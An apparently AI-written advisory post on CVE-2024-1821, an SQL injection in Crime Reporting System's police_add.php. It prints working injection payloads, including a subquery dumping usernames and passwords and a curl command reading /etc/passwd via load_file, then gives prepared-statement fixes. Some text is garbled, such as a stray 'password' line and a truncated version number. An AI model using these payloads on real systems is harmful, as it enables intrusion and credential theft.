CVE-2024-1821 - Critical SQL Injection in Crime Reporting System 1. (police_add.php) - Details, Exploit, and Patch Guidance

In early 2024, a critical vulnerability was uncovered in the open-source Crime Reporting System 1., a PHP-driven application available on Code-Projects.org. This security hole, tracked as CVE-2024-1821 and assigned VDB-254609, impacts the “police_add.php” file. Hackers can exploit this flaw using basic SQL injection tactics, letting them tamper with or steal sensitive police station user records.

In this post, we’ll break down how the vulnerability works, show code snippets of the issue, and provide a basic demonstration exploit—all in plain language. We'll also share ways to secure your system if you’re affected.

password

The backend script takes these fields directly from user input and plugs them into an SQL query—without any proper sanitization or use of prepared statements.

This means attackers can send specialized input, turning a legit form submission into a full-blown database breach.

Here’s an example of the problematic code logic (from police_add.php)

<?php
// Vulnerable processing snippet (simplified)
include('db_connect.php');
if (isset($_POST['add_police'])) {
    $police_id = $_POST['police_id'];
    $police_name = $_POST['police_name'];
    $police_spec = $_POST['police_spec'];
    $password = $_POST['password'];
  
    // UNSAFE: No input validation or sanitization!
    $query = "INSERT INTO police(police_id, police_name, police_spec, password) 
              VALUES ('$police_id', '$police_name', '$police_spec', '$password')";
    $result = mysqli_query($conn, $query);

    if ($result) {
        echo "Police added!";
    } else {
        echo "Error.";
    }
}
?>

None of the inputs are filtered, so even a simple payload like police_name=John', 'police', 'spec', 'password');-- will change the meaning of the query.

How Does the SQL Injection Work?

When user-controllable data isn’t filtered or safely encoded, attackers can inject arbitrary SQL code. For example:

Suppose an attacker submits the following POST request

POST /police_add.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

add_police=1&police_id=99&police_name=Evil'--&police_spec=test&password=test

The constructed query becomes

INSERT INTO police(police_id, police_name, police_spec, password) 
VALUES ('99', 'Evil'--', 'test', 'test')

The -- starts a comment in SQL, so everything after is ignored (including 'test', 'test')). This can break the query or let attackers inject their own SQL.

A more dangerous payload might look like

police_id=1
police_name=John', '', '', (SELECT GROUP_CONCAT(username, ':', password) FROM users)-- 
police_spec=a
password=a

If the query is constructed as in the vulnerable code, the database will now run an attacker-controlled SELECT statement, exposing users and passwords.

An exploit for CVE-2024-1821 is relatively simple. Here’s a proof of concept in curl

curl -X POST http://target-site/path/police_add.php \
  -d "add_police=1&police_id=1&police_name=test', (SELECT load_file('/etc/passwd')), '', '')-- -&police_spec=a&password=a"

In this example, if load_file is enabled, the contents of /etc/passwd would be injected.

Note: This is for demonstration on *your own systems* only! Unauthorized testing is illegal.

References

- VulDB Entry: VDB-254609
- Official Download: Crime Reporting System 1.
- CVE-2024-1821 MITRE Listing (pending)

1. Use Prepared Statements

PHP’s mysqli supports prepared queries, which stop injections natively.

Secure version

$stmt = $conn->prepare("INSERT INTO police(police_id, police_name, police_spec, password) VALUES (?, ?, ?, ?)");
$stmt->bind_param("isss", $police_id, $police_name, $police_spec, $password);
$stmt->execute();

### 2. Validate/Sanitize All Input
Never trust or blindly use data received from forms or URLs.

3. Review All Scripts

If you downloaded or forked Crime Reporting System 1., scan for similar usage patterns elsewhere.

Conclusion

CVE-2024-1821 in Crime Reporting System 1. is a classic and easy-to-exploit SQL injection, endangering database integrity and secrecy. The vulnerability has been public since 2024, making unpatched sites a high-value target for attackers.

If you run this application, update your code NOW using secure patterns above. Always keep in mind: never trust user input.

Stay safe!

*This post is exclusive to your request and uses simple American English. For questions or security consulting, reach out or comment below!*

Timeline

Published on: 02/23/2024 16:15:47 UTC
Last modified on: 03/04/2024 19:15:19 UTC